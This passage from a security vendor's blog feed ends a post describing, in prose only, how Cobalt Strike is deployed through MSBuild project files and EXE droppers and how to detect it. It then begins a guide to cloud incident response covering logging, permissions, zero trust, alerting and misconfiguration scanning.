&lt;p&gt;One popular tool used for LotL operations is the Microsoft.NET framework
utility called
&lt;a href="https://docs.microsoft.com/en-us/visualstudio/msbuild/walkthrough-using-msbuild?view=vs-2019"target="_blank" rel="noopener"&gt;MSBuild&lt;/a&gt;.
MSBuild is the build platform used for Microsoft and Visual Studio. Visual
Studio relies on MSBuild to build projects for testing and releases. Attackers
are able to pass MSBuild.exe, a project (.proj) file, to build and execute. The
payload, usually shellcode, is injected into another process. This attack is
effective for attackers as many sandboxing solutions are not able to handle
project files and struggle with fileless malware. This technique was observed
by Cisco Talos researchers in
&lt;a href="https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html"target="_blank" rel="noopener"&gt;2020&lt;/a&gt;
to deploy Cobalt Strike.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/08/cobalt-strike-detect-this-persistent-threat/images/fig5.png" title="Project file code." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Project file code.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;As shown above, the project file has an encoded and compressed payload. This
payload is decrypted, decompressed, and then copied into memory. The shellcode
is then executed in a new thread.&lt;/p&gt;
&lt;h3&gt;How to Detect?&lt;span class="hx:absolute hx:-mt-20" id="how-to-detect-2"&gt;&lt;/span&gt;
&lt;a href="#how-to-detect-2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;An endpoint with a system injected with Cobalt Strike via MSBuild is shown
below. Note the process tree at the bottom indicating the &amp;ldquo;fileless code.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/08/cobalt-strike-detect-this-persistent-threat/images/fig6.png" title="Intezer Analyze endpoint scan of a Cobalt Strike-infected system via LotL technique." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Intezer Analyze endpoint scan of a Cobalt Strike-infected system via LotL technique.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Executables (EXE) Files&lt;span class="hx:absolute hx:-mt-20" id="executables-exe-files"&gt;&lt;/span&gt;
&lt;a href="#executables-exe-files" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;There is an acronym in the United States Armed Forces called &amp;ldquo;KISS.&amp;rdquo; KISS
stands for &amp;ldquo;Keep it simple, stupid!&amp;rdquo; Sometimes simple is better, and another
way for Cobalt Strike to be deployed is in a simple Windows EXE form. This
requires either social engineering tactics to get the target to execute the
malware or another program/script to execute the file. This process involves
creation of a thread that sets up a named pipe for privilege escalation. Once
the shellcode is written to the named pipe, it is decrypted and executed in a
separate thread.&lt;/p&gt;
&lt;h3&gt;How to Detect?&lt;span class="hx:absolute hx:-mt-20" id="how-to-detect-3"&gt;&lt;/span&gt;
&lt;a href="#how-to-detect-3" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;An example of one of these payloads is shown in the
&lt;a href="https://analyze.intezer.com/files/e233fc08c1a41ed8cc7d32c8e851614aeb159f95470f4491262c818137591afc"target="_blank" rel="noopener"&gt;analysis&lt;/a&gt;
below. Notice how the Cobalt Strike code is only shown when it is executed and
found in-memory.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/08/cobalt-strike-detect-this-persistent-threat/images/fig7.png" title="Cobalt Strike found via memory analysis." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Cobalt Strike found via memory analysis.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;How can Cobalt Strike be detected and remediated?&lt;span class="hx:absolute hx:-mt-20" id="how-can-cobalt-strike-be-detected-and-remediated"&gt;&lt;/span&gt;
&lt;a href="#how-can-cobalt-strike-be-detected-and-remediated" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Due to the many ways Cobalt Strike is deployed, detection can be hard. The use
of shellcode, encoding, compression, obfuscated strings, process injection,
hashing algorithms, domain fronting, different communication channels, and
dynamically loaded libraries all give malware and network defenses a run for
their money.&lt;/p&gt;
&lt;h3&gt;Static Analysis&lt;span class="hx:absolute hx:-mt-20" id="static-analysis"&gt;&lt;/span&gt;
&lt;a href="#static-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Static analysis involves examining the file using various techniques without
actually having to execute the file itself. Static analysis can involve hashing
the file and finding intel on it, taking a look at the strings to see if there
are functionality or network indicators, or checking imports and running
signatures such as YARA for the file. Although useful, static analysis on its
own is probably not sufficient to detect Cobalt Strike.&lt;/p&gt;
&lt;p&gt;Using hash-based identification of Cobalt Strike is insufficient, since each
payload will be encrypted with different keys and each configuration will
uniquely change the hash value. It is trivial to generate a new payload for
each new target.&lt;/p&gt;
&lt;p&gt;Checking strings may be insufficient also. Strings for pipe names are
dynamically generated and incorporate random numbers, meaning they can change
every time the malware is executed. Encrypted payloads will also obfuscate
useful strings from static analysis.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware"target="_blank" rel="noopener"&gt;API Hashing&lt;/a&gt;
algorithms employed by Cobalt Strike hide imports from static analysis
techniques. Signature-based detection is great for detecting malware, but due
to the versatility of Cobalt Strike&amp;rsquo;s deployment using multiple stages and
encrypted/obfuscated payloads, an analyst may only be able to detect that a
file is going to load and execute a payload in-memory. Without dynamic
analysis, they won&amp;rsquo;t be able to detect exactly what that payload will be.&lt;/p&gt;
&lt;h3&gt;Dynamic Analysis&lt;span class="hx:absolute hx:-mt-20" id="dynamic-analysis"&gt;&lt;/span&gt;
&lt;a href="#dynamic-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Dynamic analysis is the process of executing the suspect file in order to
analyze its behavior and how it affects the environment it runs in. Dynamic
analysis can open up new areas to explore as one can follow the malware through
each stage of its deployment and functionality. Dynamic analysis can get the
malware to unpack, decode, or download additional stages. These new stages are
then subject to further dynamic analysis as well as the previously mentioned
static analysis techniques.&lt;/p&gt;
&lt;p&gt;Dynamic analysis does not have many limitations, although some malware includes
functionality to detect if it is being observed or running inside a sandboxed
environment. There is also the possibility that during dynamic analysis, areas
of malicious code may not be intentionally executed, and thus not detected in
the behavior. The best way to detect malicious code is via genetic code
analysis which is done automatically in Intezer Analyze.&lt;/p&gt;
&lt;h3&gt;Combination of Several Techniques&lt;span class="hx:absolute hx:-mt-20" id="combination-of-several-techniques"&gt;&lt;/span&gt;
&lt;a href="#combination-of-several-techniques" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The best way to detect Cobalt Strike code is through a combination of dynamic,
static, and genetic analysis. Let&amp;rsquo;s take a suspicious looking document from an
unknown entity as an example. Before opening the document, we submit it to
Intezer Analyze and get the verdict, as shown below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/08/cobalt-strike-detect-this-persistent-threat/images/fig8.png" title="Intezer Analyze result showing in-memory Cobalt Strike code." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Intezer Analyze result showing in-memory Cobalt Strike code.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The document drops and executes Cobalt Strike in the memory space of
&lt;code&gt;rundll32.exe&lt;/code&gt;. Signatures are leveraged to show capabilities and file
characteristics. Under the &amp;ldquo;TTPs&amp;rdquo; tab the user can see the
techniques/capabilities employed by the malicious document.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/08/cobalt-strike-detect-this-persistent-threat/images/fig9.png" title="TTPs section showing capabilities detected during execution." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;TTPs section showing capabilities detected during execution.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The document displays interesting techniques such as macros with
auto-execution, network activity with a unique user agent, office process
starting martian subprocess, and process injection. You can also dive deeper
into capabilities specific to the injected Cobalt Strike process.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2021/08/cobalt-strike-detect-this-persistent-threat/images/fig10.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The &amp;ldquo;IoCs&amp;rdquo; tab in Intezer Analyze shows indicators that can help you pivot and
search in your environment during investigations to map out the scope of an
attack. IoCs provides you with file hashes and network indicators such as URLs,
and IP addresses being contacted through irregular ports.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/08/cobalt-strike-detect-this-persistent-threat/images/fig11.png" title="IoCs tab showing file and network indicators." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;IoCs tab showing file and network indicators.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The &amp;ldquo;Behavior&amp;rdquo; tab shows a more in-depth analysis of the file&amp;rsquo;s behavior, where
you can see the process tree, network activity, screenshots and file/registry
activity.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/08/cobalt-strike-detect-this-persistent-threat/images/fig12.png" title="Behavior tab showing observed behavior during sandbox execution." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Behavior tab showing observed behavior during sandbox execution.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;The Only Abused Pen Testing Tool?&lt;span class="hx:absolute hx:-mt-20" id="the-only-abused-pen-testing-tool"&gt;&lt;/span&gt;
&lt;a href="#the-only-abused-pen-testing-tool" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Cobalt Strike is
&lt;a href="../../../2020/09/advanced-pasta-threat-mapping-malware-use-of-open-source-offensive-security-tools/"&gt;not the only&lt;/a&gt;
penetration testing or legitimate tool that has been co-opted and abused by
threat actors. In the past, tools such as
&lt;a href="https://github.com/a0rtega/pafish"target="_blank" rel="noopener"&gt;Pafish&lt;/a&gt; (Paranoid Fish) have been
&lt;a href="https://cdn2.hubspot.net/hubfs/1903456/Whitepapers/CopyKittens.pdf"target="_blank" rel="noopener"&gt;used by&lt;/a&gt;
Iranian actors in their tooling for virtual machine (VM) detection. The
&amp;ldquo;Sysinternals&amp;rdquo; suite has been used extensively by threat actors. Most notably,
&lt;a href="https://docs.microsoft.com/en-us/sysinternals/downloads/psexec"target="_blank" rel="noopener"&gt;PsExec&lt;/a&gt; has
been used in high-profile attacks such as the 2017
&lt;a href="https://www.theregister.com/2017/06/28/petya_notpetya_ransomware/"target="_blank" rel="noopener"&gt;NotPetya&lt;/a&gt;
global ransomware outbreak.&lt;/p&gt;
&lt;p&gt;More recently, legitimate and penetration testing tools for the cloud have been
used by threat actors. The threat actor TeamTNT has
&lt;a href="../../../2020/09/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/"&gt;used&lt;/a&gt;
Weave Scope, a trusted tool which gives the user full access to their cloud
environment, and is integrated with Docker, Kubernetes, the Distributed Cloud
Operating System (DC/OS), and AWS Elastic Compute Cloud (EC2). The attacker
installs this tool in order to map the cloud environment of their victim and
execute system commands without needing to deploy malicious code on the server.
The same group has also been
&lt;a href="https://www.cadosecurity.com/post/botnet-deploys-cloud-and-container-attack-techniques"target="_blank" rel="noopener"&gt;documented&lt;/a&gt;
using the penetration testing tool
&lt;a href="https://github.com/brompwnie/botb"target="_blank" rel="noopener"&gt;Break Out The Box&lt;/a&gt; (BOTB) for cloud and
containerized environments.&lt;/p&gt;
&lt;h2&gt;Get Started for Free&lt;span class="hx:absolute hx:-mt-20" id="get-started-for-free"&gt;&lt;/span&gt;
&lt;a href="#get-started-for-free" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;With &lt;a href="https://analyze.intezer.com/"target="_blank" rel="noopener"&gt;Intezer Analyze&lt;/a&gt;, you can analyze any
suspicious files that you encounter, including non-executable files such as
Microsoft Office documents, scripts, archives, and more. Stay on top of
analyzing and classifying Cobalt Strike among other threats.
&lt;a href="https://analyze.intezer.com/create-account"target="_blank" rel="noopener"&gt;Get started&lt;/a&gt; for free and start
with 50 file uploads per month.&lt;/p&gt;</description></item><item><title>Guide to Digital Forensics Incident Response in the Cloud</title><link>https://research.intezer.com/blog/2021/08/guide-to-digital-forensics-incident-response-in-the-cloud/</link><pubDate>Wed, 11 Aug 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/08/guide-to-digital-forensics-incident-response-in-the-cloud/</guid><description>
&lt;p&gt;Enterprises today rely on a wide range of cloud services—infrastructure as a
service (IaaS), platform as a service (PaaS), software as a service (SaaS), and
more—to meet their business needs. But the growing popularity of cloud has also
led to an increase in attacks on cloud infrastructure, and thus the need for
companies to develop strong security and incident response skills. Before we
dive into incident response in the cloud, however, it&amp;rsquo;s important to
distinguish between the responsibility of the cloud service provider (CSP) and
that of the cloud consumer. According to the &amp;ldquo;shared responsibility model,&amp;rdquo; the
CSP is responsible for securing the cloud, while security in the cloud falls on
the customer. This means it&amp;rsquo;s the client&amp;rsquo;s job to protect their workloads
(including applications, systems, and code) running on the CSP&amp;rsquo;s platform. With
this responsibility placed on the customer, how they respond to an attack can
have a significant impact on the mitigation of security breaches. But incidents
in the cloud, such as those involving your EC2s, differ from those occurring
on-premises (e.g., involving endpoints). This poses new challenges for incident
response teams and requires different approaches. In this blog, we cover the
differences between cloud forensics and forensics in on-premises systems. We
also take a look at the incident response process for a real attack that was
spotted in the wild.&lt;/p&gt;
&lt;h2&gt;Incident Response: Cloud vs. Endpoint&lt;span class="hx:absolute hx:-mt-20" id="incident-response-cloud-vs-endpoint"&gt;&lt;/span&gt;
&lt;a href="#incident-response-cloud-vs-endpoint" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The incident response process involves a skilled response or security team
gathering the information needed in order to conduct a thorough investigation
of the incident. But incident response in the cloud presents obstacles that
don&amp;rsquo;t exist when investigating standard endpoints. The main difference between
cloud and on-premises systems is the degree of access and control a user has
over resources. On-premises systems provide users full access to both hardware
and software, while access in the cloud is limited depending on the type of
service being used and the service provider. Because cloud systems are
distributed, the forensic evidence may be spread out across the globe, making
it difficult to gather all of the information needed to investigate. These
factors need to be taken into consideration. The challenges of incident
response in the cloud can be divided into six categories, each of which are
covered below.&lt;/p&gt;
&lt;h3&gt;Collecting Forensic Evidence&lt;span class="hx:absolute hx:-mt-20" id="collecting-forensic-evidence"&gt;&lt;/span&gt;
&lt;a href="#collecting-forensic-evidence" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;When investigating incidents on endpoint or on-premises systems, the
investigator has full access to all of the resources, including logs, memory
dumps, hard drives, and more. But this isn&amp;rsquo;t the case in a cloud environment.
First, access to the forensics data depends on the cloud model. For instance,
IaaS customers will have access to more data relative to SaaS customers. For
example, let&amp;rsquo;s assume attackers gained access to a messaging application (SaaS)
used by company employees and stole sensitive data. In order to obtain the
compromised/malicious account information (e.g., IP addresses and logs), the
company would have to contact the messaging application and ask them to provide
this information. On the other hand, if attackers gained access to an EC2
(IaaS) instance, as long as you have basic logging and monitoring capabilities,
you&amp;rsquo;d be able to access more information on your own, without the help of the
CSP.
&lt;a href="https://link.springer.com/content/pdf/10.1007%2F978-3-319-07881-6_19.pdf"target="_blank" rel="noopener"&gt;CSPs are not inclined to provide logs and data&lt;/a&gt;
for fear of exposing sensitive information that could compromise them or their
customers. In other cases, they may be reluctant to do so because they simply
don&amp;rsquo;t know how to handle the event. If customers of service models like PaaS
and SaaS depend on their CSP for logs, they may not have access to important
information needed in order to conduct a thorough investigation. On the other
hand, customers using IaaS have greater control and the ability to set up
different logs. Customers should therefore configure logs and especially what
to log. But logging everything isn&amp;rsquo;t the best solution, since this results in a
huge amount of information that needs to be filtered, analyzed, and stored.
Sifting through such large amounts of data during an investigation can be
overwhelming and time-consuming. While CSPs provide logging services, the more
logs your system produces, the more expensive it will be. The cost will also
depend on whether you&amp;rsquo;re using
&lt;a href="https://aws.amazon.com/cloudwatch/pricing/"target="_blank" rel="noopener"&gt;AWS&lt;/a&gt;,
&lt;a href="https://azure.microsoft.com/en-us/pricing/details/monitor/"target="_blank" rel="noopener"&gt;Azure&lt;/a&gt;, or
&lt;a href="https://cloud.google.com/stackdriver/pricing"target="_blank" rel="noopener"&gt;GCP&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Data is Volatile or Not Saved&lt;span class="hx:absolute hx:-mt-20" id="data-is-volatile-or-not-saved"&gt;&lt;/span&gt;
&lt;a href="#data-is-volatile-or-not-saved" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The incident response process is based on collecting information, including
events that happened prior to the incident. CSPs provide clients with many
tools that need to be configured according to your organization&amp;rsquo;s needs. This
means the amount of data you can collect depends on what you choose to log and
store, as well as the time period for which the data is stored. In an IaaS like
AWS, the data stored on the instances is lost after termination of the machine.
As a result,
&lt;a href="https://aws.amazon.com/premiumsupport/knowledge-center/recovery-terminated-instance/"target="_blank" rel="noopener"&gt;important evidence is lost&lt;/a&gt;,
including commands, scripts, processes, and files. Attackers can take advantage
of this data loss to hide their malicious activity once they&amp;rsquo;ve completed their
task.&lt;/p&gt;
&lt;h3&gt;No Physical Evidence&lt;span class="hx:absolute hx:-mt-20" id="no-physical-evidence"&gt;&lt;/span&gt;
&lt;a href="#no-physical-evidence" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;In the cloud, systems are distributed, and the physical components on which the
data is stored may be in different geographic locations. This can make it
nearly impossible to acquire the physical evidence or to perform physical
forensics. Since each country has different laws, the process of seizing
hardware involves collaboration between different governing legal authorities,
which is a long and complicated process, with no guarantee the drives can be
retrieved. Without access to the physical drives, investigators need to ensure
they&amp;rsquo;re using the appropriate forensics tools, since many rely on access to
hardware. This has created a real need for new tools developed specifically for
cloud forensics.&lt;/p&gt;
&lt;h3&gt;Chain of Custody and Privacy Laws&lt;span class="hx:absolute hx:-mt-20" id="chain-of-custody-and-privacy-laws"&gt;&lt;/span&gt;
&lt;a href="#chain-of-custody-and-privacy-laws" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Due to the nature of cloud computing and the way data is stored, a single
physical hard drive may contain the information of multiple customers. CSPs
must notify clients that their data is protected and logically segmented from
other tenants so they know other tenants can&amp;rsquo;t access their information—and
vice versa. This makes collecting data from the hard drive complicated, and
ultimately, only the CSP will be able to do so. If evidence is presented in a
court of law, the investigators must maintain the chain of custody of that
evidence throughout the investigation. This becomes a major challenge due to
multi-jurisdictional laws, further compounded when CSPs and other third-party
companies join in the evidence collection process.&lt;/p&gt;
&lt;h3&gt;CSP Limitations&lt;span class="hx:absolute hx:-mt-20" id="csp-limitations"&gt;&lt;/span&gt;
&lt;a href="#csp-limitations" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;When an incident occurs, especially in SaaS and PaaS infrastructures,
investigators must rely on the CSP to assist in the investigation. Another
challenge is the dependency between CSPs and third parties. For example, a
provider of email services may use a third-party platform to host its
infrastructure. In the event of an incident, the investigators would have to
collaborate with all of the entities in this chain of dependencies, each with
their own incident response approaches and methods. Once again, this
prolongates the
&lt;a href="https://intezer.com/blog/malware-analysis/save-incident-response-time-intezer-analyze/"target="_blank" rel="noopener"&gt;incident response time&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Service-Level Agreement (SLA)&lt;span class="hx:absolute hx:-mt-20" id="service-level-agreement-sla"&gt;&lt;/span&gt;
&lt;a href="#service-level-agreement-sla" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;When it comes to SLAs, important terms related to forensics are often missing.
This is due to both the failure of CSPs to provide full transparency in this
regard as well as a lack of customer awareness on the matter. In the case of an
incident, this creates an additional barrier for customers attempting to
collect all the evidence needed for the investigation process.&lt;/p&gt;
&lt;h2&gt;Overcoming the Challenges of Incident Response in the Cloud&lt;span class="hx:absolute hx:-mt-20" id="overcoming-the-challenges-of-incident-response-in-the-cloud"&gt;&lt;/span&gt;
&lt;a href="#overcoming-the-challenges-of-incident-response-in-the-cloud" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The
&lt;a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf"target="_blank" rel="noopener"&gt;incident response lifecycle&lt;/a&gt;
can be broken down into four phases, as outlined by the National Institute of
Standards and Technology (NIST). As visible from Figure 1, the process is
cyclical, meaning it is an ongoing learning process whereby organizations can
continue to improve their prevention and response methods.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/08/guide-to-digital-forensics-incident-response-in-the-cloud/images/fig1.png" title="Figure 1: Cycle of incident response (Source: The National Institute of Standards and Technology)" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 1: Cycle of incident response (Source: The National Institute of Standards and Technology)&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The challenges of incident response in the cloud are complex, and not all can
be solved at once. However, there are actions that can be taken in the various
stages of the process to help you better handle and investigate incidents.&lt;/p&gt;
&lt;h3&gt;Preparation Stage&lt;span class="hx:absolute hx:-mt-20" id="preparation-stage"&gt;&lt;/span&gt;
&lt;a href="#preparation-stage" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Preparation is the most important stage. When your systems are well configured
and your software is up to date, your response team will be prepared. This
reduces incident handling time and even prevents attacks from happening in the
first place.&lt;/p&gt;
&lt;h4&gt;Setting Logs&lt;span class="hx:absolute hx:-mt-20" id="setting-logs"&gt;&lt;/span&gt;
&lt;a href="#setting-logs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Logging events in the cloud is the key to proper incident handling. If your
cloud provider offers logging options, you should use them. Just remember,
logging everything isn&amp;rsquo;t ideal; instead, carefully choose which events and
resources should be logged. For example, in order to set notifications for
suspicious activities such as unusual access to secrets in your company&amp;rsquo;s cloud
account, you can configure
&lt;a href="https://docs.aws.amazon.com/cloudtrail/index.html"target="_blank" rel="noopener"&gt;CloudTrail&lt;/a&gt; to log these
events. Each provider has its own set of recommendations, so be sure to follow
the CIS benchmark best practices for the CSP you are using, whether
&lt;a href="https://docs.aws.amazon.com/config/latest/developerguide/operational-best-practices-for-cis_aws_benchmark_level_1.html"target="_blank" rel="noopener"&gt;AWS&lt;/a&gt;,
&lt;a href="https://docs.microsoft.com/en-us/azure/security/fundamentals/operational-best-practices"target="_blank" rel="noopener"&gt;Azure&lt;/a&gt;,
or &lt;a href="https://cloud.google.com/security/best-practices"target="_blank" rel="noopener"&gt;GCP&lt;/a&gt;.&lt;/p&gt;
&lt;h4&gt;Rules and Permissions&lt;span class="hx:absolute hx:-mt-20" id="rules-and-permissions"&gt;&lt;/span&gt;
&lt;a href="#rules-and-permissions" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Set permissions and rules for each user and group based on the principle of
least privilege policy, where a user is given the minimum level of access and
permissions they need to do their job. For example, each development team
should only have access to the repositories and servers relevant to their
specific departments, and developers should have permissions to add new code
only to projects they are currently working on. But members of the finance
department—or any other department that doesn&amp;rsquo;t require it—shouldn&amp;rsquo;t have
access to any of these resources.&lt;/p&gt;
&lt;h4&gt;Zero Trust&lt;span class="hx:absolute hx:-mt-20" id="zero-trust"&gt;&lt;/span&gt;
&lt;a href="#zero-trust" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Use the zero trust approach when configuring your network. Based on this
concept, no device is trusted until its integrity and identity are verified.
There are many ways to apply this model:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Implement a network and logical segmentation on the VPC in
&lt;a href="https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html"target="_blank" rel="noopener"&gt;AWS&lt;/a&gt;,
&lt;a href="https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview"target="_blank" rel="noopener"&gt;Azure Virtual Network&lt;/a&gt;
(VNet), or &lt;a href="https://cloud.google.com/vpc"target="_blank" rel="noopener"&gt;GCP&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;For access control:
&lt;ul&gt;
&lt;li&gt;Identify all of the company&amp;rsquo;s employees and configure roles for each of
them.&lt;/li&gt;
&lt;li&gt;Manage company devices (e.g., laptops) and verify their integrity using
&lt;a href="https://www.manageengine.com/mobile-device-management/what-is-mdm.html"target="_blank" rel="noopener"&gt;MDM&lt;/a&gt;
solutions such as
&lt;a href="https://jumpcloud.com/blog/hosted-mdm-solution"target="_blank" rel="noopener"&gt;JumpCloud&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Map permissions for each asset to each role in the company.&lt;/li&gt;
&lt;li&gt;Map the application employees need to use and implement SSO authentication.&lt;/li&gt;
&lt;li&gt;Implement two-factor authentication (2FA).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Notifications&lt;span class="hx:absolute hx:-mt-20" id="notifications"&gt;&lt;/span&gt;
&lt;a href="#notifications" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Add alarms and notifications for specific events, but try to minimize false
positive alerts. There are two types of alerts; those that are triggered by a
user&amp;rsquo;s actions and those that come from system and metrics events. It&amp;rsquo;s
important to configure both types, but the configuration of events that will
trigger alerts also depends on your company&amp;rsquo;s organizational behavior. Examples
include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;User alerts: If all of your company employees use the same VPN configuration,
setting a geolocation login alert will notify you of any suspicious login
attempts that do not originate from your VPN.&lt;/li&gt;
&lt;li&gt;System alerts: If your cloud infrastructure doesn&amp;rsquo;t typically require high
CPU and memory usage, setting an alert for high usage will allow you to
address any anomalies in the system.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Prepare in Advance for Different Types of Attacks&lt;span class="hx:absolute hx:-mt-20" id="prepare-in-advance-for-different-types-of-attacks"&gt;&lt;/span&gt;
&lt;a href="#prepare-in-advance-for-different-types-of-attacks" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Make sure you&amp;rsquo;re ready for whatever type of attack comes your way:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Backup and recovery: Develop a recovery plan and maintain up-to-date backups
of your organization&amp;rsquo;s most valuable data. Using cloud backups, which employs
versioning to make copies of all your files, will ensure continuous backup
and make it easier to restore data after any attacks.&lt;/li&gt;
&lt;li&gt;Playbooks: Prepare a playbook of routines and the actions for different
incident scenarios.&lt;/li&gt;
&lt;li&gt;Recovery drills: Prepare a recovery drill to test your backups so you&amp;rsquo;re
fully prepared to use them when they are most needed.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These preparations can help with many different incidents, such as DDoS attacks
that prevent customers from accessing your system, or ransomware attacks that
encrypt all the files in your environment. Following the principles of chaos
engineering, you can use automated tools like
&lt;a href="https://github.com/Netflix/chaosmonkey"target="_blank" rel="noopener"&gt;Chaos Monkey&lt;/a&gt; to test your system&amp;rsquo;s
resilience. Last, define the impacts and prioritize risks for every component
in your environment, so you know where to put your best efforts during an
incident.&lt;/p&gt;
&lt;h4&gt;Know Your Runtime&lt;span class="hx:absolute hx:-mt-20" id="know-your-runtime"&gt;&lt;/span&gt;
&lt;a href="#know-your-runtime" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Knowing what code is being executed in your environment makes it easy to detect
any unauthorized code that could be part of an attack. A cloud workload
protection platform (CWPP) that monitors your runtime and alerts you on the
execution of code that deviates from your known code baseline will help you
identify and stop attacks in their earliest stages.&lt;/p&gt;
&lt;h4&gt;Fix Misconfigurations&lt;span class="hx:absolute hx:-mt-20" id="fix-misconfigurations"&gt;&lt;/span&gt;
&lt;a href="#fix-misconfigurations" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Cloud infrastructure can be complex, with many components and services that
need to be configured. This increases your opportunity for error. Scanning your
cloud environment for misconfigurations is important, because attackers are
scanning as well. And if they find it before you do, the consequences can be
catastrophic. There are many cloud security posture management (CSPM) tools
that can be used for misconfiguration scanning. A few examples include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;GCP&amp;rsquo;s
&lt;a href="https://cloud.google.com/security-command-center/"target="_blank" rel="noopener"&gt;Security Command Center&lt;/a&gt;
(SCC).&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloudsploit.com/opensource"target="_blank" rel="noopener"&gt;CloudSploit&lt;/a&gt;, an open-source project
that finds security misconfigurations in cloud infrastructures.&lt;/li&gt;
